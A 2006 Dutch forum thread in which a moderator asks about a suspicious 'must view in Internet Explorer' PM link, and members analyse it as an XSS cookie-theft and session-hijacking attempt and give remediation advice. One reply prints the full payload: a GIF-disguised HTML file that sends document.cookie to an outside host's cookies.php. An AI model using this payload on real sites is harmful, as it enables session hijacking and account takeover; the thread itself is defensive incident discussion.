[IE] Exploitable link via PM op een forum gekregen? * - Privacy en beveiliging

dinsdag 9 mei 2006 22:21

Acties:

brit-tweaker

Topicstarter

Ik ben moderator op treocentral.com en kreeg een vaag PMetje daar.

i found this security hole in the forum

http://discuss.treocentral.com/imag...line=1147042835

(MUST VIEW IN INERNET EXPLORER)

i hope you really are an admin.

link in PM is: *knip* wat er niet uit ziet als een verhulde URL ofzo, dus was ik zo suf om er op te klikken..
En kreeg een of andere page met wat rommel tekens en een pop up met 'owned'

Is dit een bekende hacking methode?
Kunnen ze er kwaad mee?

klikken op link uiteraard op eigen risico...

[ Voor 9% gewijzigd door pasta op 09-05-2006 23:49 ]

Mag je een gegeten paard in de bek kijken?

dinsdag 9 mei 2006 22:23

Acties:

Bor

Coördinator Frontpage Admins / FP Powermod

01000010 01101111 01110010

Het feit dat men al aangeeft "must viewed in internet explorer". Dan gaan hier direct al alarm belletjes rinkelen hoor. Waarschijnlijk proberen ze een security hole in IE te exploiten wat alleen kan wanneer jij de gevraagde pagina met exploitcode opvraagt.

Over Bor | Vraag & Aanbod feedback | Frontpagemoderatie Forum

dinsdag 9 mei 2006 22:25

Acties:

Twee Dee

Morgen weer een ondertitel.

Is het wel zo handig om hier dan naar die pagina te linken?

Luister nou gewoon naar me, dat voorkomt dat ik later "zie je wel" moet zeggen.

dinsdag 9 mei 2006 22:25

Acties:

ToolkiT

brit-tweaker

Topicstarter

Bor de Wollef schreef op dinsdag 09 mei 2006 @ 22:23:
Het feit dat men al aangeeft "must viewed in internet explorer". Dan gaan hier direct al alarm belletjes rinkelen hoor. Waarschijnlijk proberen ze een security hole in IE te exploiten wat alleen kan wanneer jij de gevraagde pagina met exploitcode opvraagt.

klopt, dat bedacht ik me achteraf ook

even een suf momentje..
Vraag me alleen af wat de schade is en hoe ze het doen..

Mag je een gegeten paard in de bek kijken?

dinsdag 9 mei 2006 22:25

Acties:

Jokuh

ow kut.. ik heb op de link geklik.. er stond schermpje met owned... ben ik nu genaaid?

dinsdag 9 mei 2006 22:26

Acties:

geez

Bor de Wollef schreef op dinsdag 09 mei 2006 @ 22:23:
Het feit dat men al aangeeft "must viewed in internet explorer". Dan gaan hier direct al alarm belletjes rinkelen hoor. Waarschijnlijk proberen ze een security hole in IE te exploiten wat alleen kan wanneer jij de gevraagde pagina met exploitcode opvraagt.

^^^ with stupid

edit:
traag

[ Voor 6% gewijzigd door geez op 09-05-2006 22:26 ]

dinsdag 9 mei 2006 22:26

Acties:

ToolkiT

brit-tweaker

Topicstarter

Twee Dee schreef op dinsdag 09 mei 2006 @ 22:25:
Is het wel zo handig om hier dan naar die pagina te linken?

ik neem aan als jij als niet lid er op klikt er weinig mis kan gaan, en door het te posten weet misschien iemand wat hun truck is..

Hij vroeg trouwens om een admin, niet een mod. dus misschien is er nog niks mis...

Mag je een gegeten paard in de bek kijken?

dinsdag 9 mei 2006 22:27

Acties:

Bertus

Jokuh schreef op dinsdag 09 mei 2006 @ 22:25:
ow kut.. ik heb op de link geklik.. er stond schermpje met owned... ben ik nu genaaid?

Ja.

Verander iig snel je wachtwoord etc.

Heeft ook een computer!

dinsdag 9 mei 2006 22:27

Acties:

hendrikjan

VOORMALIG STUNTMAN

ik heb ff glickt en dit is de code

code:

GIF89al><html><head><style>.getcookies{background-image:url('javascript:new Image().src="http://49mb.com/cookies/cookies.php?c="+encodeURI(document.cookie);');}</style><p class="getcookies"></p><script>alert('owned');</script></head></html>

bij mij stond er verder niks .. maar ik ging met faiafox kijken

[ Voor 31% gewijzigd door hendrikjan op 09-05-2006 22:28 ]

dinsdag 9 mei 2006 22:27

Acties:

Jokuh

uhmm?? welk wachtwoord? f*ck! nu durf ik niet te gaan slapen...

[ Voor 51% gewijzigd door Jokuh op 09-05-2006 22:30 ]

dinsdag 9 mei 2006 22:31

Acties:

84n44n

Het scriptje probeert een of andere cookie te stelen, maar ik zie niet goed van welk domein..

dinsdag 9 mei 2006 22:33

Acties:

Bertus

Jokuh schreef op dinsdag 09 mei 2006 @ 22:27:
uhmm?? welk wachtwoord? f*ck! nu durf ik niet te gaan slapen...

van je account op dat forum

Heeft ook een computer!

dinsdag 9 mei 2006 22:35

Acties:

MadMarky

Begint eer ge bezint

84n44n schreef op dinsdag 09 mei 2006 @ 22:31:
Het scriptje probeert een of andere cookie te stelen, maar ik zie niet goed van welk domein..

Dat weet je ook niet, want dat staat in een php scriptje.

🖥️ | 🚗

dinsdag 9 mei 2006 22:36

Acties:

Pascal

84n44n schreef op dinsdag 09 mei 2006 @ 22:31:
Het scriptje probeert een of andere cookie te stelen, maar ik zie niet goed van welk domein..

denk van het domain: discuss.treocentral.com omdat vandaar ook het "script" wordt geladen...

dinsdag 9 mei 2006 22:36

Acties:

Jokuh

Bertus schreef op dinsdag 09 mei 2006 @ 22:33:
[...]

van je account op dat forum

Ik heb geen account op dat forum... Ik heb alleen op de link geklikt.
Kan er nu iets gebeuren met accounts zoals msn? of als tweakers?

[ Voor 14% gewijzigd door Jokuh op 09-05-2006 22:38 ]

dinsdag 9 mei 2006 22:38

Acties:

Morax

Het scriptje lijkt al je coookies te stelen. Wachtwoorden ben je waarschijnlijk niet kwijt, maar het lijkt me zeer verstanding alle sessies op fora en sites die je open hebt staan uit te loggen, en weer compleet opnieuw in te loggen.

Met behulp van bijvoorbeeld je ReactID hier op GoT die in een cookie word gezet kan je sessie overgenomen worden door iemand (waardoor hij dus effectief ingelogd is onder jouw account). Dus zeker als je ergens moderator of admin bent, raad ik je aan al je openstaande sessies te beëindigen

[ Voor 3% gewijzigd door Morax op 09-05-2006 22:39 ]

What do you mean I have no life? I am a gamer, I got millions!

dinsdag 9 mei 2006 22:43

Acties:

hendrikjan

VOORMALIG STUNTMAN

Morax schreef op dinsdag 09 mei 2006 @ 22:38:
Het scriptje lijkt al je coookies te stelen. Wachtwoorden ben je waarschijnlijk niet kwijt, maar het lijkt me zeer verstanding alle sessies op fora en sites die je open hebt staan uit te loggen, en weer compleet opnieuw in te loggen.

Met behulp van bijvoorbeeld je ReactID hier op GoT die in een cookie word gezet kan je sessie overgenomen worden door iemand (waardoor hij dus effectief ingelogd is onder jouw account). Dus zeker als je ergens moderator of admin bent, raad ik je aan al je openstaande sessies te beëindigen

toch wel weer belabberd dat dat zo makkelijk is ....

dinsdag 9 mei 2006 22:45

Acties:

ToolkiT

brit-tweaker

Topicstarter

Dus cookies deleten, uitloggen, nieuw password moet genoeg zijn als oplossing?

Mag je een gegeten paard in de bek kijken?

dinsdag 9 mei 2006 22:48

Acties:

frickY

Het is voor een site onmogelijk om cookies van andere domeinen uit te lezen.
Dit is gewoon een poging tot sesison-hijacking.

Als zij jou sessie ID hebben (die staati n het cookie) kunnen ze die in hun eigen cookie zetten, en zijn ze spontaan ingelogt met jowu account (als je sessie verder niet IP gebonden is).
Als jij admin bent op dat forum, waar ze in de pm specifiek naar vragen, dan zijn zij dat nu dus ook.

Wachtwoord wijzigen en uitloggen. Afhankelijk van hoe het systeem werkt wordt de sessie vernietigd, en is het sessieID niet meer geldig (zoals hier op GoT $_/-\o_$ )

dinsdag 9 mei 2006 22:49

Acties:

Jokuh

Tja ik heb al cookies delete en uitgezet dus.. Nu durf ik weer te slapen en ik kijk morgen wel verder voor instructies op dit topic.

Laterrrr

dinsdag 9 mei 2006 22:53

Acties:

Morax

ToolkiT schreef op dinsdag 09 mei 2006 @ 22:45:
Dus cookies deleten, uitloggen, nieuw password moet genoeg zijn als oplossing?

Meer dan genoeg

Jokuh schreef op dinsdag 09 mei 2006 @ 22:49:
Tja ik heb al cookies delete en uitgezet dus.. Nu durf ik weer te slapen en ik kijk morgen wel verder voor instructies op dit topic.

Laterrrr

Er valt niet meer te doen dan wat ToolkiT hierboven schrijft

What do you mean I have no life? I am a gamer, I got millions!

dinsdag 9 mei 2006 23:06

Acties:

ToolkiT

brit-tweaker

Topicstarter

ok, cool.

Bedankt voor de feedback

Mag je een gegeten paard in de bek kijken?

dinsdag 9 mei 2006 23:07

Acties:

Bor

Coördinator Frontpage Admins / FP Powermod

01000010 01101111 01110010

Jokuh schreef op dinsdag 09 mei 2006 @ 22:49:
Tja ik heb al cookies delete en uitgezet dus.. Nu durf ik weer te slapen en ik kijk morgen wel verder voor instructies op dit topic.

Laterrrr

Alleen cookies deleten is onvoldoende hoor. Je zult de accounts ook echt moeten uitloggen (en hopen dat men de verkregen info niet al heeft gebruikt om je accounts aan te passen zoals bv het bij de accounts behorende mail adres wijzigen waardoor je zelfs access blijft houden wanneer jij uitlogd (gewoon nieuw wachtwoord opvragen).

Over Bor | Vraag & Aanbod feedback | Frontpagemoderatie Forum

dinsdag 9 mei 2006 23:51

Acties:

pasta

Ondertitel

Ik heb de link toch maar verwijderd, voor de mensen die ook een account hadden op dat forum.

Verder voer ik nog even een titelfixje uit.

Signature

woensdag 10 mei 2006 00:03

Acties:

MadMarky

Begint eer ge bezint

Volgens mij is dat php scriptje uit die url al lang niet meer bereikbaar, het lukte me iig niet om hem te downloaden.

🖥️ | 🚗

donderdag 11 mei 2006 22:28

Acties:

AW_Bos

Liefhebber van nostalgie... 🕰️

Ik weet niet wat voor forumsoftware het is, maar ik raad wel de TS aan om eens met de admins van zijn forumte overleggen voor een forum-software-update.

Want XXS is niet zo leuk inderdaad.

☎ Telecommunicatie van vroeger
🚅Alles over spoor en treintjes

vrijdag 12 mei 2006 11:12

Acties:

ToolkiT

brit-tweaker

Topicstarter

AW_Bos schreef op donderdag 11 mei 2006 @ 22:28:
Ik weet niet wat voor forumsoftware het is, maar ik raad wel de TS aan om eens met de admins van zijn forumte overleggen voor een forum-software-update.

Want XXS is niet zo leuk inderdaad.

Ik heb ze op de hoogte gesteld van het gebeuren.. dus de bal ligt bij hun..
Maar aangezien ik geen admin ben daar kan er denk ik weinig kwaad..

Mag je een gegeten paard in de bek kijken?